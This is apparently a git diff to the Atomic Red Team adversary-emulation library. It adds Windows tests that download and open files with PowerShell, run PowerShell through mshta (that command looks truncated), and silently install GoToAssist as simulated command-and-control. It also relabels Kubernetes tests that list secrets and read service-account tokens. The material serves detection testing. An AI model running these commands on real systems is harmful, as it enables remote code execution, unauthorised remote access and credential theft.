+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 8682f1e1..fe099523 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -30,6 +30,8 @@ Mshta.exe can be used to bypass application control solutions that do not accoun - [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path) +- [Atomic Test #10 - Mshta used to Execute PowerShell](#atomic-test-10---mshta-used-to-execute-powershell) +
@@ -423,4 +425,38 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
+ +## Atomic Test #10 - Mshta used to Execute PowerShell +Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 8707a805-2b76-4f32-b1c0-14e558205772 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| message | Encoded message to include | string | Hello,%20MSHTA!| +| seconds_to_sleep | How many seconds to sleep/wait | string | 5| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +mshta.exe "about:'" +``` + + + + + +
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 84790d0a..c6bb81eb 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -214,4 +214,24 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' - name: powershell \ No newline at end of file + name: powershell + +- name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: | + Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: | + mshta.exe "about:'" + name: command_prompt diff --git a/atomics/T1219/Bin/GoToCleanup.ps1 b/atomics/T1219/Bin/GoToCleanup.ps1 new file mode 100644 index 00000000..f4ae96de --- /dev/null +++ b/atomics/T1219/Bin/GoToCleanup.ps1 @@ -0,0 +1,14 @@ +# GoTo Opener - delete registry install key because it can't be called by the system +$InstalledApp = "GoTo Opener" +$Keys = Get-ChildItem -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall -ErrorAction SilentlyContinue +$Items = $Keys | Get-ItemProperty | where-object {$_.DisplayName -eq $InstalledApp} +If ($Items) { + $KeyToDelete = $Items.PSPath + Remove-Item $KeyToDelete -Recurse -Force -ErrorAction SilentlyContinue +} +# GoTo Opener - delete user directories +Get-ChildItem "C:\Users\*\AppData" "GoTo Opener" -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { + $Directory = $_.ToString() + Remove-Item $Directory -Recurse -Force -ErrorAction SilentlyContinue + } +Start-Process -FilePath "C:\Program Files (x86)\GoToAssist Remote Support Expert\1702\g2ax_uninstaller_expert.exe" -ArgumentList "/uninstall /silent" -Wait -PassThru | Out-Null diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 58c028d8..a80908e0 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit - [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows) +- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows) +
@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore +
+
+ +## Atomic Test #4 - GoToAssist Files Detected Test on Windows +An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" +$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" +Start-Process $file1 /S; +``` + +#### Cleanup Commands: +```powershell +try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} +``` + + + + +
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 3231d454..701645f1 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -55,3 +55,18 @@ atomic_tests: name: powershell elevation_required: true +- name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: | + An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: + try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true \ No newline at end of file diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index 9bcf155c..568a9c41 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -16,7 +16,7 @@ An adversary may access the Docker API to collect logs that contain credentials ## Atomic Test #1 - ListSecrets A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. -**Supported Platforms:** macOS, Linux +**Supported Platforms:** Containers **auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index c52c1078..34c4d88c 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. supported_platforms: - - macos - - linux + - containers input_arguments: namespace: description: K8s namespace to list @@ -22,7 +21,7 @@ atomic_tests: elevation_required: false - name: Cat the contents of a Kubernetes service account token file - auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f + auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f description: | Access the Kubernetes service account access token stored within a container in a cluster. @@ -76,4 +75,4 @@ atomic_tests: kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token name: sh cleanup_command: | - kubectl --context kind-atomic-cluster delete pod atomic-pod \ No newline at end of file + kubectl --context kind-atomic-cluster delete pod atomic-pod diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index e3aaf7bd..0a8d1989 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -14,7 +14,7 @@ In Docker, adversaries may specify an entrypoint during container deployment tha ## Atomic Test #1 - ExecIntoContainer Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. -**Supported Platforms:** Linux, macOS +**Supported Platforms:** Containers **auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml index 30303151..603506ab 100644 --- a/atomics/T1609/T1609.yaml +++ b/atomics/T1609/T1609.yaml @@ -6,8 +6,7 @@ atomic_tests: description: | Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. supported_platforms: - - linux - - macos + - containers input_arguments: namespace: description: K8s namespace to use @@ -26,4 +25,4 @@ atomic_tests: cleanup_command: | kubectl delete pod busybox -n #{namespace} name: bash - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index 910e11e7..7d43bccb 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -18,7 +18,7 @@ Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ -**Supported Platforms:** Linux +**Supported Platforms:** Containers **auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff diff --git a/atomics/T1611/T1611.yaml b/atomics/T1611/T1611.yaml index f68cda11..4be7a64f 100644 --- a/atomics/T1611/T1611.yaml +++ b/atomics/T1611/T1611.yaml @@ -12,7 +12,7 @@ atomic_tests: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - - linux + - containers dependency_executor_name: sh dependencies: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..53d1ea44 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,10 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 +8b3f4ed6-077b-4bdd-891c-2d237f19410f +49eb9404-5e0f-4031-a179-b40f7be385e3 +1b72b3bd-72f8-4b63-a30b-84e91b9c3578 +8707a805-2b76-4f32-b1c0-14e558205772 diff --git a/docs/_layouts/default.html b/docs/_layouts/default.html index 80f8ca1f..279d4546 100644 --- a/docs/_layouts/default.html +++ b/docs/_layouts/default.html @@ -31,7 +31,7 @@ APIs Related View on GitHub - Join on Slack + Join on Slack